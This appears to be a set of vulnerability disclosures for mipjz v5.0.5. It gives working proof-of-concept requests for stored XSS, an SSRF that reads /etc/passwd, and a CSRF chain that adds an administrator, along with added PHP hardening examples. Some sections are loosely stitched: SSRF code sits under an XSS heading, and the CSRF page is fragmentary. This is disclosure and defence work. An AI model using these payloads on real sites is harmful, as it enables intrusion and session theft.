sansanyun / mipjz
thinkphp5
Home Page: https://www.mipcms.com
License: Other
[Vulnerability Description]
Cross Site Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/sansanyun/mipjz
http://www.mipjz.com/
[Affected Product Code Base]
v5.0.5
[Vulnerability Proof]
POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1
Host: 192.168.11.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
dataId:
Content-Length: 426
Origin: http://192.168.11.102
Connection: close
Referer: http://192.168.11.102/index.php?s=/admin/
Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0
{"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss<img src onerror=alert(1)>","publish_time":"","fieldList":"[{\"value\":\"\",\"key\":\"diy_aaa\",\"name\":\"<img src onerror=alert(1)>\"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}
[Code Details]
Vulnerability location: app/setting/controller/ApiAdminDomainSettings.php
The problem arises in lines 28-39:
$ch = curl_init();
$options = array(
    CURLOPT_URL => $api,                        // $api comes straight from the request (only trim() is applied)
    CURLOPT_POST => true,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POSTFIELDS => implode("\n", $urls),
    CURLOPT_HTTPHEADER => array('Content-Type: text/plain'),
);
curl_setopt_array($ch, $options);
$result = curl_exec($ch);                       // fetches whatever scheme/host the caller supplied, e.g. file://
curl_exec is called with $api, which is controllable; only trim is applied to the $api parameter in the above code, without any filtering, and finally the JSON-encoded data is returned.
poc:
http://site/index.php?s=/setting/ApiAdminDomainSettings/urlPost
post:
postAddress=file:///etc/passwd&url=xx&id=
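A hardened form of the urlPost curl call, added here as an example and not taken from mipjz; the function names and the allowed-host list ('api.example.com') are assumptions.

```php
<?php
// Added example, not mipjz code: a hardened replacement for the urlPost curl
// call above. The scheme and host are allow-listed before curl_exec, and curl
// itself is pinned to HTTP(S) as defence in depth, so file:///etc/passwd and
// other non-web targets are refused. Function names and the allowed-host
// list ('api.example.com') are assumptions for this example.

function isAllowedApiUrl(string $api, array $allowedHosts): bool
{
    $parts = parse_url(trim($api));           // the original code only trims
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return false;                         // file:///etc/passwd has no host
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;                         // never file:, gopher:, dict:, ...
    }
    return in_array(strtolower($parts['host']), $allowedHosts, true);
}

function safeUrlPost(string $api, array $urls, array $allowedHosts): ?string
{
    if (!isAllowedApiUrl($api, $allowedHosts)) {
        return null;                          // refuse rather than fetch
    }
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL             => $api,
        CURLOPT_POST            => true,
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_POSTFIELDS      => implode("\n", $urls),
        CURLOPT_HTTPHEADER      => ['Content-Type: text/plain'],
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS, // curl-level allow-list
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,     // no redirect to an internal host
        CURLOPT_TIMEOUT         => 10,
    ]);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result === false ? null : $result;
}

// Constructed inputs: the report's PoC value and an allow-listed API URL.
$allowed = ['api.example.com'];
var_dump(isAllowedApiUrl('file:///etc/passwd', $allowed));
var_dump(isAllowedApiUrl('http://api.example.com/urls', $allowed));
```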
This is a stored XSS which allows an attacker to insert JavaScript code into the database. When a user views the message, the attacker is able to steal the user's cookie.
Filename: /app/widget/controller/ApiAdminWidgetPages.php
Code:
public function itemAdd()
{
    $title = input('post.title');
    $url_name = input('post.url_name');
    $template = input('post.template');
    $content = input('post.content');
    $keywords = input('post.keywords');
    $description = input('post.description');
    if (!$title) {
        return jsonError('请输入名称');                 // "please enter a name"
    }
    if (!$url_name) {
        return jsonError('请输入别名');                 // "please enter an alias"
    }
    $itemInfo = db('WidgetPages')->where('title',$title)->find();
    if ($itemInfo) {
        return jsonError('名称已存在,请重新输入');      // "name already exists"
    }
    $itemInfo = db('WidgetPages')->where('url_name',$url_name)->find();
    if ($itemInfo) {
        return jsonError('别名已存在,请重新输入');      // "alias already exists"
    }
    db('WidgetPages')->insert(array(
        'id' => uuid(),
        'title' => $title,                              // stored raw
        'url_name' => $url_name,
        'template' => $template,
        'keywords' => $keywords,                        // stored raw: XSS sink
        'description' => $description,                  // stored raw: XSS sink
        'content' => htmlspecialchars($content),        // the only field that is escaped
    ));
    return jsonSuccess('成功');                         // "success"
}
The location of the vulnerability appears in the parameters keywords and description.
POC:
POST /index.php?s=/widget/ApiAdminWidgetPages/itemAdd HTTP/1.1
Host: qing.com
Content-Length: 208
Accept: application/json, text/plain, */*
Origin: http://qing.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
dataId:
Content-Type: application/json;charset=UTF-8
Referer: http://qing.com/index.php?s=/admin/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=af90qhjsiusodrq36a86dgunr0
Connection: close
{"title":"aa","url_name":"a","template":"page","content":"<p><span style=\"\">asdasd</span><br></p>","keywords":"\">aa<script>alert('test');</script>","description":"\">aa<script>alert('test');</script>"}
After the administrator has logged in, opening the following page, one.html, adds a Super Manager.
<script>history.pushState('', '', '/')</script>
Poc address: https://github.com/sp1d3r/swf_json_csrf
1. Add a user:
http://[Attack domain]/read.html?jsonData={%22groupId%22:1,%22username%22:%22admin123%22,%22password%22:%220192023a7bbd73250516f069df18b500%22,%22rpassword%22:%220192023a7bbd73250516f069df18b500%22}&php_url=http://[Attack domain]/test.php&endpoint=http://[Target domain]/index.php?s=/user/ApiAdminUser/itemAdd
2. Promote the user's privileges to administrator privileges
Log in with admin123 / admin123 and get the user's UID.
Promote the user's privileges:
http://[Attack domain]/read.html?jsonData={"uid":"[The UID]","groupId":1,"username":"admin123","password":"3f7caa3d471688b704b73e9a77b1107f","rpassword":"3f7caa3d471688b704b73e9a77b1107f"}&php_url=http://[Attack domain]/test.php&endpoint=http://[Target domain]/index.php?s=/user/ApiAdminUser/itemEdit
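A server-side guard for the admin JSON endpoints abused in the CSRF flow above (user/ApiAdminUser/itemAdd and itemEdit), added as an example and not taken from mipjz; the header name, site host and token values are assumptions.

```php
<?php
// Added example, not mipjz code: a guard for state-changing admin JSON endpoints
// such as user/ApiAdminUser/itemAdd and itemEdit. A request is accepted only if
// (1) its Origin (or, failing that, Referer) host is the site's own host and
// (2) the anti-CSRF token it carries in a header equals the token bound to the
// session. Header name, site host and token values are assumptions here.

function requestOriginHost(array $headers): ?string
{
    foreach (['Origin', 'Referer'] as $name) {
        if (!empty($headers[$name])) {
            $host = parse_url($headers[$name], PHP_URL_HOST);
            return $host ? strtolower($host) : null;   // malformed header: treat as foreign
        }
    }
    return null;  // neither header present: treat as foreign, not as trusted
}

function isTrustedAdminRequest(array $headers, string $siteHost, ?string $sessionToken): bool
{
    if (requestOriginHost($headers) !== strtolower($siteHost)) {
        return false;                                  // cross-site post with the victim's cookies
    }
    $sent = $headers['X-CSRF-Token'] ?? '';
    if ($sessionToken === null || $sent === '') {
        return false;                                  // token missing on either side
    }
    return hash_equals($sessionToken, $sent);          // constant-time comparison
}

// Constructed inputs. The relayed request from the PoC flow arrives with the
// victim's session cookie but from the attacker's domain and without a token;
// the legitimate admin UI request carries both the site Origin and the token.
$sessionToken = 'constructed-session-token';
$forged = ['Origin' => 'http://attacker.example', 'Content-Type' => 'application/json'];
$legit  = ['Origin' => 'http://192.168.11.102', 'X-CSRF-Token' => $sessionToken];
var_dump(isTrustedAdminRequest($forged, '192.168.11.102', $sessionToken));
var_dump(isTrustedAdminRequest($legit, '192.168.11.102', $sessionToken));
```

The first call is rejected and the second accepted; cookies alone never authorise the write.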
[Vulnerability Description]
Cross Site Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the tag category name field from categoryAdd.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/sansanyun/mipjz
http://www.mipjz.com/
[Affected Product Code Base]
v5.0.5
[Vulnerability Proof]
POST /index.php?s=/tag/ApiAdminTagCategory/categoryAdd HTTP/1.1
Host: 192.168.11.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
dataId:
Content-Length: 286
Origin: http://192.168.11.102
Connection: close
Referer: http://192.168.11.102/index.php?s=/admin/
Cookie: jERzUAUdppHHnews=2%2C1; jERzUAUdppHHproduct=1%2C3; csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0
{"pid":0,"name":"xss<img src onerror=alert(1)>","url_name":"aaa","seo_title":"","template":"tag.html","detail_template":"tagDetail.html","category_url":"/tag/<url_name>/","category_page_url":"<category_url>index_<page>.html","detail_url":"/tag/<id>.html","description":"","keywords":""}
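One output-encoding helper covering the three stored XSS reports above (article description, widget page keywords/description, tag category name), added as an example and not taken from mipjz; the function and field names are assumptions.

```php
<?php
// Added example, not mipjz code: the three XSS reports above share one root
// cause, fields such as title, keywords, description and name are stored and
// later rendered unescaped while only content is passed through
// htmlspecialchars(). This applies one encoding helper to every user-supplied
// field at output time, with ENT_QUOTES so the "> attribute-breakout payloads
// are neutralised as well as plain <img onerror> tags. Names are assumptions.

function e(string $value): string
{
    // ENT_QUOTES encodes ' and " (needed inside attribute values), ENT_SUBSTITUTE
    // replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderMeta(array $item): string
{
    // Encode at the sink. Storing raw text is acceptable only if every output
    // path encodes; escaping a single field on insert, as itemAdd does, is not.
    return '<meta name="keywords" content="' . e($item['keywords']) . '">' . "\n"
         . '<meta name="description" content="' . e($item['description']) . '">' . "\n"
         . '<h1>' . e($item['title']) . '</h1>';
}

function isNeutralised(string $encoded): bool
{
    // Regression check: no raw angle bracket or quote may survive encoding.
    return strpbrk($encoded, "<>\"'") === false;
}

// Constructed item built from the payloads in the reports above.
$item = [
    'title'       => 'xss<img src onerror=alert(22)>',
    'keywords'    => '">aa<script>alert(\'test\');</script>',
    'description' => 'xss<img src onerror=alert(1)>',
];
echo renderMeta($item), "\n";
foreach ($item as $field => $raw) {
    printf("%-12s neutralised: %s\n", $field, isNeutralised(e($raw)) ? 'yes' : 'no');
}
```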